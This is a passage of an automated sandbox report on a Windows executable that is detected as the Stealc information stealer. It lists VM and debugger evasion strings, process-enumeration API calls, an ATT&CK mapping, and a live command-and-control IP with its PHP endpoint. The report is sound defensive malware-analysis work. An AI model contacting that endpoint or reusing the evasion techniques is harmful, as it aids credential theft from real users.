                      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware Ng il
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-46044
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-46047
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-45886
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-46065
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-46063
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-46058
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-45932
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI call chain: ExitProcess graph end nodegraph_0-46087
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,0_2_00404610
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]0_2_00419AA0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_02C236A3 push dword ptr fs:[00000030h]0_2_02C236A3
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04840D90 mov eax, dword ptr fs:[00000030h]0_2_04840D90
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04859D07 mov eax, dword ptr fs:[00000030h]0_2_04859D07
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484092B mov eax, dword ptr fs:[00000030h]0_2_0484092B
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0485D481 SetUnhandledExceptionFilter,0_2_0485D481
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0485B2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0485B2BF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0485B8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0485B8A1
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: lxEu3xfjIb.exe PID: 1436, type: MEMORYSTR
                      Searches for specific processes (likely to inject)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048599F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_048599F7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04859B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_04859B47
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048869EF cpuid 0_2_048869EF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_04857F87
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0
                      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.3.lxEu3xfjIb.exe.4920000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.4840e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.4840e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lxEu3xfjIb.exe PID: 1436, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.3.lxEu3xfjIb.exe.4920000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.4840e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.4840e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lxEu3xfjIb.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lxEu3xfjIb.exe PID: 1436, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API                      		1
                      Create Account                      		11
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Virtualization/Sandbox Evasion                      		LSASS Memory31
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools                      		Security Account Manager1
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS11
                      Process Discovery                      		Distributed Component Object ModelInput Capture12
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Account Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      System Owner/User Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing                      		DCSync1
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc Filesystem133
                      System Information Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      lxEu3xfjIb.exe100%AviraHEUR/AGEN.1312571
                      lxEu3xfjIb.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                      http://upx.sf.net0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://95.215.207.176/d8ddb681db736e16.phptrue
                        		unknown
                        http://95.215.207.176/true
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://95.215.207.176/d8ddb681db736e16.phpSlxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://95.215.207.176/d8ddb681db736e16.php&lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://95.215.207.176/d8ddb681db736e16.phpflxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://95.215.207.176/d8ddb681db736e16.phpHlxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://docs.rs/getrandom#nodejs-es-module-supportlxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://95.215.207.176lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmptrue
                                    		unknown
                                    http://95.215.207.176/$lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://95.215.207.176/wslxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://upx.sf.netAmcache.hve.4.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://95.215.207.176/d8ddb681db736e16.phpVlxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://95.215.207.176/d8ddb681db736e16.php:lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            95.215.207.176
                                            		unknownUkraine
                                            		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1546917
                                            Start date and time:2024-11-01 17:43:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 41s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:lxEu3xfjIb.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:bb99cde9173ee6e21b61963f6a4a60da.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@2/5@0/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 23
                                            • Number of non-executed functions: 199
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: lxEu3xfjIb.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:44:23API Interceptor1x Sleep call for process: WerFault.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            95.215.207.176mFRLWyUa7u.exeGet hashmaliciousStealcBrowse
                                            • 95.215.207.176/d8ddb681db736e16.php
                                            xLgTQcFdIJ.exeGet hashmaliciousStealc, VidarBrowse
                                            • 95.215.207.176/d8ddb681db736e16.php

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ON-LINE-DATAServerlocation-NetherlandsDrontenNLmFRLWyUa7u.exeGet hashmaliciousStealcBrowse
                                            • 95.215.207.176
                                            xLgTQcFdIJ.exeGet hashmaliciousStealc, VidarBrowse
                                            • 95.215.207.176
                                            XJQkTVvJ3I.exeGet hashmaliciousStealcBrowse
                                            • 185.235.128.16
                                            WGo3ga1AL9.exeGet hashmaliciousStealc, VidarBrowse
                                            • 185.235.128.16
                                            I43xo3KKfS.exeGet hashmaliciousStealcBrowse
                                            • 45.88.105.105
                                            Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                            • 45.88.105.105
                                            b4s45TboUL.exeGet hashmaliciousStealc, VidarBrowse
                                            • 45.91.200.39
                                            qPNf2kJgzI.exeGet hashmaliciousStealcBrowse
                                            • 45.91.200.39
                                            tdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                            • 45.91.200.39
                                            y3c6AzPbtt.exeGet hashmaliciousStealcBrowse
                                            • 45.88.105.194

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lxEu3xfjIb.exe_6a39ec7dc1e69d3743f713aa75b8913c42b9f40_0a061317_b4af8d3d-2408-4610-94bc-e983b4fb00c5\Report.wer

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):0.9625697521222515
                                            Encrypted:false
                                            SSDEEP:96:7aE6AMYGs1hCH7nfSQXIDcQmc6ccEZcw3KH+HbHg/wWGTf3hOycaGHh4vXNtZruP:WHYGL0oYjnjsqZrP2izuiF/Z24IO8L
                                            MD5:F534E5C56DED81C019095ED874DD802D
                                            SHA1:B6DEE9F5C9D4163113F684DCBC8FE8FCCAB361DA
                                            SHA-256:A00BC6742A560DEEEABF25D954E09076DF9102070F42AEFF0E098B118348B19A
                                            SHA-512:257E8E695D2B853DD0F2321B98B9C79229B8FDF2F91947734F65BADF5401797986F2AB4A936121D0CF5FCF38FD91A7C8403A6C9E5DCBAFF913A43E4D0B7E5ACF
                                            Malicious:true
                                            Reputation:low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.9.5.3.0.4.5.4.9.1.8.0.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.9.5.3.0.4.5.9.1.3.6.7.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.a.f.8.d.3.d.-.2.4.0.8.-.4.6.1.0.-.9.4.b.c.-.e.9.8.3.b.4.f.b.0.0.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.3.f.7.4.c.2.-.6.c.0.d.-.4.f.c.d.-.b.8.f.9.-.7.e.c.9.b.7.3.9.c.5.2.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.x.E.u.3.x.f.j.I.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.c.-.0.0.0.1.-.0.0.1.4.-.a.f.3.0.-.4.6.4.0.7.d.2.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.e.4.1.1.d.0.7.d.f.5.7.0.c.1.8.d.9.0.0.f.2.0.3.9.7.5.9.a.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.2.b.c.f.f.0.e.b.a.6.9.c.4.5.9.2.e.4.d.2.9.5.9.e.8.a.2.e.3.5.f.c.3.5.4.1.6.3.3.8.!.l.x.E.u.3.x.f.j.I.b...e.x.e.....T.a.r.g.e.t.A.p.p.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC397.tmp.dmp

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 14 streams, Fri Nov 1 16:44:05 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):61886
                                            Entropy (8bit):1.8466896978949758
                                            Encrypted:false
                                            SSDEEP:192:Id7XfWAKHXWeOgOJwafPqTcotE7rwTyRyp5CzCAA/ncQG8Xwi7dGFPSkGrucL6r:8SAKmZgE9fPq/tKJ0fTXwZlU9Wr
                                            MD5:4D9C631A329B7C49FE8B1A55F7D7AE51
                                            SHA1:7D9F9AA5A0EB04062FB4126A2E2977B6B9D80F91
                                            SHA-256:4D7261CB61375CE499C4C07B226E782C079825080930C45A3154E4DEECA4E533
                                            SHA-512:CED4B8D4A67505B5882BD7884BB91749E97CEAADE0E52D7947587E18F5D70E4CFE8350DA974F213A77DB4044F10E410896D81B763DF2F15DE26FE0232AE01CF1
                                            Malicious:false
                                            Reputation:low
                                            Preview:MDMP..a..... .......U.%g............4...............<............*..........T.......8...........T...........P3..n.......................................................................................................eJ......H.......GenuineIntel............T...........O.%g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC463.tmp.WERInternalMetadata.xml

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8340
                                            Entropy (8bit):3.7034730559417435
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJ5w6ZOu6YEIxSU9m/FPgmfRPpDG89b1Asfbnm:R6lXJ+656YEeSU9mtgmfRV1Tfy
                                            MD5:56171415A96F6A311EEA419D95850D2C
                                            SHA1:A8D9CDFBC22D457BCC4041D044DDACCD1106A8A5
                                            SHA-256:DD4DB1FF1EAD087F4409140517B0071EB5B2F76314EE971AF2DF6725B74C5589
                                            SHA-512:17388971416E827842785A0BC18CC3241D8117C03DABCD77E8ABFCA1857BC3F1680AC60A4CEF3D9C9DD2FA201DE5C71B35A1B7911080DF6B150B7A075A3CE7EA
                                            Malicious:false
                                            Reputation:low
